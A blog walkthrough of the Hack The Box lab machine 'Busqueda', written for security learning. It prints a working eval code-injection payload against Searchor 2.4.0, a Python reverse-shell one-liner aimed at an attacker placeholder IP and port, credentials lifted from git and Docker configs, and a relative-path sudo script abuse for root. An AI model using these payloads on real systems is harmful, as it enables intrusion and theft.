By sahil in hack the box

Hack The Box | Busqueda

A classic CTF box that'll make you feel good about cracking it. If you have a tinkerer's mind, hop in.

Hack The Box | Busqueda
Hack The Box Busqueda

This is a classic CTF box. You just need a tinkerer's mind, and of course, Burp Suite. If you don't know how to setup Burp or connect to HTB, please search your way through it.

Reconnaissance

The IP of the machine is 10.10.11.208. First, you should always navigate to the IP and see if it's running a web app on the default port 80 / 443. In this case, it is.

searchor application we need to pwn

ProTip - If you don't see the site when you navigate to the IP, just add the IP to your hosts file. In this case, it's going to be 10.10.11.208 searcher.htb.  Again, google your way through it if you don't know how.

Let's start a nmap scan while we look into what the web app actually does.

nmap -sC -sV -oA default.ouput searcher.htb

Here's what the flag in the nmap command actually means. The command is courtesy of Ippsec.Rocks

  • -sC : Run default script for fingerprinting the application running the ports.
  • -sV : Enumerate the versions of the applications running on the ports.
  • -oA : Output the data in all available formats.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Searcher
| http-server-header:
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.1.2 Python/3.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap output

The output is pretty simple. There are just 2 ports available, 22, and 80. Running a fairly exploit-free, SSH and a Web Server respectively.

The application however is what should interest us. It allows you to choose a Engine and Search for anything. It even auto-redirects you to whatever engine's website with your search query in there.

Your first thought might be Open Redirect or SSRF. Both those techniques prove pointless in this case. But what you should do is send the POST request to Burp Suite to fuzz with the parameter.

But something even more interesting is there on the site just in plain sight. Look at the footer. "Powered by Flask and Searchor 2.4.0".

Giving up the tech behind the website is a definate red flag. And some googling later we find this.

exploit for searchor 2.4.0

In short, they're using the eval function, which one should never use. It takes any string argument and runs it as a command.

Looking at the POC, we can see that we can pass additional arguments to the method by placing a "," at the end. Let's try it then.

curl -X POST http://searcher.htb/search -d "engine=Amazon&query=',__import__('os').system('ls /home/'))#"

svc
https://www.amazon.com/s?k=
code injection successfull

SUCCESS! We have code injection. You can either grab the user flag via curl or you can start a shell.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('YOURIP','YOURPORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

# On another terminal screen type this before sending the above payload
nc -lvnp
payload for python shell
we have contact

We have a shell. Now we can start the Privilege Escalation process.

Privilege Escalation

A simple ls -a tells us that the current directory is a .git project. So let's see whats inside the config.

cat .git/config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main
config of git directory

Now we have a username, password, and another host to mess with. gitea.searcher.htb. Make sure you add this to your hosts file or it won't resolve.

Same password can be used to SSH into the server. Now let's see which files the user is allowed to run as root.

sudo -S -l

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
the script you can run with super user privileges

We're allowed to run the system-checkup.py script as sudo, let's see what it lets us run.

 sudo /usr/bin/python3 /opt/scripts/system-checkup.py args
 Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
the script you can run with super user privileges

docker-ps lets you see all the running containers. docker-inspect lets you dump the config of those containers, sounds interesting, lets see.

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format={{.Config}} f84a6b33fb5a

--format={f84a6b33fb5a   false false false map[3306/tcp:{} 33060/tcp:{}] false false false [MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF MYSQL_USER=gitea MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh MYSQL_DATABASE=gitea PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GOSU_VERSION=1.14 MYSQL_MAJOR=8.0 MYSQL_VERSION=8.0.31-1.el8 MYSQL_SHELL_VERSION=8.0.31-1.el8] [mysqld] <nil> false mysql:8 map[/var/lib/mysql:{}]  [docker-entrypoint.sh] false  [] map[com.docker.compose.config-hash:1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b com.docker.compose.container-number:1 com.docker.compose.oneoff:False com.docker.compose.project:docker com.docker.compose.project.config_files:docker-compose.yml com.docker.compose.project.working_dir:/root/scripts/docker com.docker.compose.service:db com.docker.compose.version:1.29.2]  <nil> []}
the output for running the docker-inspect

Now we have more usernames and passwords. You can try to SSH into the system with the given passwords but it won't work. So let's go to gitea.searcher.htb.

Unsurprisingly, it's running a gitea server. We already have credentials to login as "cody". Once logged in you can see there's another account called Administrator. Rather than looking for a way to exploit yet another web app, let's try to use one of the usernames and passwords we found to login as Administrator, spoiler alert, it worked.

Now we can see the source code for the system-checkup.py script in one of Admin's repos.

See the mistake here?

system-checkup.py script's source code

When you run the script with full-checkup flag, it'll look for a file called full-checkup.sh in whatever directory you're currently in.

So the next steps are pretty simple, go to your $HOME directory. Create a file called full-checkup.sh

#!/bin/sh
cat /root/root.txt

and run the full-checkup flag. This will print out the root flag.

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

7486cf3edf89e3cc5b4c************
Getting Root Flag